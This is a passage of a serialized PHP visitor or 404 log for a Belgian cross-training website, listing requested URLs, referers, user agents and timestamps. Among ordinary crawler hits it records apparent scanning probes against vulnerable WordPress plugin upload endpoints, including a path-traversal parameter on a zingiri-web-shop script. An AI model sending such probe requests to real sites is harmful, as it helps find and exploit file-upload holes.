t_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:42:\"http://www.crosstrainingcenter.be/lequipe/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436502;}s:74:\"http://www.crosstrainingcenter.be/contact/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:18;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:42:\"http://www.crosstrainingcenter.be/contact/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1462464185;}s:73:\"http://www.crosstrainingcenter.be/this.options[this.selectedIndex].value;\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:66:\"http://www.crosstrainingcenter.be/g;m.parentNode.insertBefore(a,m)\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1376436072;}s:66:\"http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png\";a:5:{s:9:\"hit_count\";i:6;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:21:\"http://www.google.be/\";i:1;s:21:\"http://www.google.fr/\";}s:11:\"user_agents\";a:3:{i:0;s:19:\"Googlebot-Image/1.0\";i:1;s:137:\"Mozilla/5.0 (Linux; Android 4.1.2; GT-S7390 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36\";i:2;s:138:\"Mozilla/5.0 (Linux; Android 4.3; D5503 Build/14.2.A.1.114) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.94 Mobile Safari/537.36\";}s:13:\"last_hit_time\";i:1430714516;}s:35:\"http://www.crosstrainingcenter.be/(\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:34:\"http://www.crosstrainingcenter.be/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1385207699;}s:53:\"http://www.crosstrainingcenter.be/le-cross-training/(\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:52:\"http://www.crosstrainingcenter.be/le-cross-training/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1385207702;}s:53:\"http://www.crosstrainingcenter.be/notre-philosophie/(\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:52:\"http://www.crosstrainingcenter.be/notre-philosophie/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1385207708;}s:47:\"http://www.crosstrainingcenter.be/les-seances/(\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:46:\"http://www.crosstrainingcenter.be/les-seances/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436495;}s:43:\"http://www.crosstrainingcenter.be/lequipe/(\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:42:\"http://www.crosstrainingcenter.be/lequipe/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436500;}s:56:\"http://www.crosstrainingcenter.be/pdg/css/960_24_col.css\";a:5:{s:9:\"hit_count\";i:13;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:38:\"http://www.crosstrainingcenter.be/pdg/\";i:1;s:47:\"http://www.crosstrainingcenter.be/pdg/style.css\";}s:11:\"user_agents\";a:6:{i:0;s:128:\"Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A501 Safari/9537.53\";i:1;s:191:\"Mozilla/5.0 (Symbian/3; Series60/5.3 NokiaC7-00/111.040.1511; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.1.4 Mobile Safari/535.1 3gpp-gba\";i:2;s:132:\"Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; GT-P5110 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\";i:3;s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1\";i:4;s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0\";i:5;s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36\";}s:13:\"last_hit_time\";i:1383469258;}s:51:\"http://www.crosstrainingcenter.be/pdg/css/reset.css\";a:5:{s:9:\"hit_count\";i:10;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:38:\"http://www.crosstrainingcenter.be/pdg/\";}s:11:\"user_agents\";a:4:{i:0;s:128:\"Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A501 Safari/9537.53\";i:1;s:191:\"Mozilla/5.0 (Symbian/3; Series60/5.3 NokiaC7-00/111.040.1511; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.1.4 Mobile Safari/535.1 3gpp-gba\";i:2;s:75:\"Opera/9.80 (Macintosh; Intel Mac OS X 10.8.5) Presto/2.12.388 Version/12.16\";i:3;s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\";}s:13:\"last_hit_time\";i:1387874397;}s:101:\"http://www.crosstrainingcenter.be/http:/www.crosstrainingcenter.be/wp-content/themes/figero/style.css\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:98:\"http://crosstrainingcenter.be/http://www.crosstrainingcenter.be/wp-content/themes/figero/style.css\";}s:11:\"user_agents\";a:1:{i:0;s:65:\"Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0\";}s:13:\"last_hit_time\";i:1383139637;}s:134:\"http://www.crosstrainingcenter.be/http:/www.crosstrainingcenter.be/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=3.5.3\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:131:\"http://crosstrainingcenter.be/http://www.crosstrainingcenter.be/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=3.5.3\";}s:11:\"user_agents\";a:1:{i:0;s:65:\"Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0\";}s:13:\"last_hit_time\";i:1383139640;}s:149:\"http://www.crosstrainingcenter.be/http:/www.crosstrainingcenter.be/wp-content/plugins/piklist/parts/css/jquery-ui/jquery-ui.smoothness.css?ver=1.10.3\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:146:\"http://crosstrainingcenter.be/http://www.crosstrainingcenter.be/wp-content/plugins/piklist/parts/css/jquery-ui/jquery-ui.smoothness.css?ver=1.10.3\";}s:11:\"user_agents\";a:1:{i:0;s:65:\"Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0\";}s:13:\"last_hit_time\";i:1383139645;}s:146:\"http://www.crosstrainingcenter.be/http:/www.crosstrainingcenter.be/wp-content/plugins/slideshow-manager/coin-slider/coin-slider-styles.css?ver=3.7\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:143:\"http://crosstrainingcenter.be/http://www.crosstrainingcenter.be/wp-content/plugins/slideshow-manager/coin-slider/coin-slider-styles.css?ver=3.7\";}s:11:\"user_agents\";a:1:{i:0;s:65:\"Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0\";}s:13:\"last_hit_time\";i:1383139648;}s:48:\"http://www.crosstrainingcenter.be/comments/feed/\";a:5:{s:9:\"hit_count\";i:144;s:6:\"is_new\";b:1;s:8:\"referers\";a:8:{i:0;s:34:\"http://www.crosstrainingcenter.be/\";i:1;s:52:\"http://www.crosstrainingcenter.be/notre-philosophie/\";i:2;s:52:\"http://www.crosstrainingcenter.be/le-cross-training/\";i:3;s:46:\"http://www.crosstrainingcenter.be/les-seances/\";i:4;s:44:\"http://www.crosstrainingcenter.be/en-images/\";i:5;s:42:\"http://www.crosstrainingcenter.be/contact/\";i:6;s:42:\"http://www.crosstrainingcenter.be/lequipe/\";i:7;s:33:\"http://www.crosstrainingcenter.be\";}s:11:\"user_agents\";a:21:{i:0;s:179:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\";i:1;s:74:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1\";i:2;s:178:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322; InfoPath.2; .NET4.0C; .NET4.0E)\";i:3;s:8:\"PHPCrawl\";i:4;s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";i:5;s:171:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\";i:6;s:245:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";i:7;s:157:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\";i:8;s:83:\"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)\";i:9;s:196:\"Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";i:10;s:55:\"berlin-fu-cow/vlcow2014 (+http://hpsg.fu-berlin.de/cow)\";i:11;s:76:\"Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)\";i:12;s:164:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC)\";i:13;s:89:\"Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)\";i:14;s:74:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1\";i:15;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36\";i:16;s:157:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)\";i:17;s:83:\"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\";i:18;s:198:\"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";i:19;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36\";i:20;s:64:\"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\";}s:13:\"last_hit_time\";i:1500407884;}s:40:\"http://www.crosstrainingcenter.be/ok.png\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:51:\"http://www.crosstrainingcenter.be/reservation1.html\";}s:11:\"user_agents\";a:1:{i:0;s:128:\"Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A501 Safari/9537.53\";}s:13:\"last_hit_time\";i:1387132965;}s:80:\"http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/692428003.png\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:52:\"msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)\";}s:13:\"last_hit_time\";i:1392564829;}s:92:\"http://www.crosstrainingcenter.be/wp-content/plugins/xcloner-backup-and-restore/css/main.css\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:92:\"http://www.crosstrainingcenter.be/wp-content/plugins/xcloner-backup-and-restore/css/main.css\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1393173545;}s:84:\"http://www.crosstrainingcenter.be/wp-content/plugins/tell-a-friend/tell-a-friend.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:83:\"http://crosstrainingbenefits.com/wp-content/plugins/tell-a-friend/tell-a-friend.php\";}s:11:\"user_agents\";a:1:{i:0;s:202:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\";}s:13:\"last_hit_time\";i:1393865111;}s:38:\"http://www.crosstrainingcenter.be/?p=2\";a:5:{s:9:\"hit_count\";i:7;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:38:\"http://www.crosstrainingcenter.be/?p=2\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393947497;}s:38:\"http://www.crosstrainingcenter.be/?p=3\";a:5:{s:9:\"hit_count\";i:9;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:38:\"http://www.crosstrainingcenter.be/?p=3\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393947899;}s:38:\"http://www.crosstrainingcenter.be/?p=4\";a:5:{s:9:\"hit_count\";i:7;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:38:\"http://www.crosstrainingcenter.be/?p=4\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393948249;}s:38:\"http://www.crosstrainingcenter.be/?p=6\";a:5:{s:9:\"hit_count\";i:4;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:38:\"http://www.crosstrainingcenter.be/?p=6\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393948525;}s:99:\"http://www.crosstrainingcenter.be/wp-content/plugins/advanced-custom-fields/core/actions/export.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:99:\"http://www.crosstrainingcenter.be/wp-content/plugins/advanced-custom-fields/core/actions/export.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393948758;}s:100:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:100:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php\";}s:11:\"user_agents\";a:2:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";i:1;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36\";}s:13:\"last_hit_time\";i:1468519178;}s:89:\"http://www.crosstrainingcenter.be/wp-content/themes/clockstone/theme/functions/upload.php\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:89:\"http://www.crosstrainingcenter.be/wp-content/themes/clockstone/theme/functions/upload.php\";i:1;s:85:\"http://crosstrainingcenter.be/wp-content/themes/clockstone/theme/functions/upload.php\";}s:11:\"user_agents\";a:2:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";i:1;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36\";}s:13:\"last_hit_time\";i:1466158369;}s:96:\"http://www.crosstrainingcenter.be/wp-content/themes/deep-blue/megaframe/megapanel/inc/upload.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:96:\"http://www.crosstrainingcenter.be/wp-content/themes/deep-blue/megaframe/megapanel/inc/upload.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393948871;}s:129:\"http://www.crosstrainingcenter.be/wp-content/plugins/zingiri-web-shop/fwkfor/ajax/uploadfilexd.php?fh=/../../../../../../wp-admin\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:129:\"http://www.crosstrainingcenter.be/wp-content/plugins/zingiri-web-shop/fwkfor/ajax/uploadfilexd.php?fh=/../../../../../../wp-admin\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393948905;}s:79:\"http://www.crosstrainingcenter.be/wp-content/plugins/wpstorecart/php/upload.php\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:79:\"http://www.crosstrainingcenter.be/wp-content/plugins/wpstorecart/php/upload.php\";i:1;s:22:\"http://www.google.com/\";}s:11:\"user_agents\";a:2:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";i:1;s:112:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36\";}s:13:\"last_hit_time\";i:1485153886;}s:101:\"http://www.crosstrainingcenter.be/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php\";a:5:{s:9:\"hit_count\";i:4;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:101:\"http://www.crosstrainingcenter.be/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php\";i:1;s:97:\"http://crosstrainingcenter.be/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php\";}s:11:\"user_agents\";a:2:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";i:1;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36\";}s:13:\"last_hit_time\";i:1470237568;}s:93:\"http://www.crosstrainingcenter.be/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:93:\"http://www.crosstrainingcenter.be/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393948988;}s:91:\"http://www.crosstrainingcenter.be/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:91:\"http://www.crosstrainingcenter.be/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393949015;}s:96:\"http://www.crosstrainingcenter.be/wp-content/plugins/mini-mail-dashboard-widget/wp-mini-mail.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:96:\"http://www.crosstrainingcenter.be/wp-content/plugins/mini-mail-dashboard-widget/wp-mini-mail.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393949045;}s:96:\"http://www.crosstrainingcenter.be/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:96:\"http://www.crosstrainingcenter.be/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393949070;}s:96:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:96:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php\";}s:11:\"user_agents\";a:2:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";i:1;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36\";}s:13:\"last_hit_time\";i:1471349660;}s:92:\"http://www.crosstrainingcenter.be/wp-content/themes/OptimizePress/lib/admin/media-upload.php\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:92:\"http://www.crosstrainingcenter.be/wp-content/themes/OptimizePress/lib/admin/media-upload.php\";i:1;s:88:\"http://crosstrainingcenter.be/wp-content/themes/OptimizePress/lib/admin/media-upload.php\";}s:11:\"user_agents\";a:2:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";i:1;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36\";}s:13:\"last_hit_time\";i:1466635743;}s:103:\"http://www.crosstrainingcenter.be/notified-Notify_page?aHR0cDovL3d3dy5jcm9zc3RyYWluaW5nY2VudGVyLmJlLw==\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:193:\"http://www.google.be/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=1&ved=0CCoQFjAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&ei=wEUYU5y2CI-qhAfp14HoDw&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ\";}s:11:\"user_agents\";a:1:{i:0;s:178:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322; InfoPath.2; .NET4.0C; .NET4.0E)\";}s:13:\"last_hit_time\";i:1394099653;}s:101:\"http://www.crosstrainingcenter.be/verify-Notify_page?aHR0cDovL3d3dy5jcm9zc3RyYWluaW5nY2VudGVyLmJlLw==\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:215:\"http://www.google.be/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=2&ved=0CDAQFjAB&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&ei=CkkYU_eDJImUhQfbh4GYBQ&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ&bvm=bv.62577051,d.ZG4\";}s:11:\"user_agents\";a:1:{i:0;s:178:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322; InfoPath.2)\";}s:13:\"last_hit_time\";i:1394100498;}s:45:\"http://www.crosstrainingcenter.be/default.php\";a:5:{s:9:\"hit_count\";i:5;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:45:\"http://www.crosstrainingcenter.be/default.php\";i:1;s:22:\"http://www.google.com/\";}s:11:\"user_agents\";a:2:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";i:1;s:112:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36\";}s:13:\"last_hit_time\";i:1490245253;}s:48:\"http://www.crosstrainingcenter.be/administrator/\";a:5:{s:9:\"hit_count\";i:10;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:53:\"http://crosstrainingcenter.be/administrator/index.php\";i:1;s:48:\"http://www.crosstrainingcenter.be/administrator/\";}s:11:\"user_agents\";a:9:{i:0;s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";i:1;s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0\";i:2;s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0\";i:3;s:102:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36\";i:4;s:71:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)\";i:5;s:63:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\";i:6;s:65:\"Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0\";i:7;s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36\";i:8;s:65:\"Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 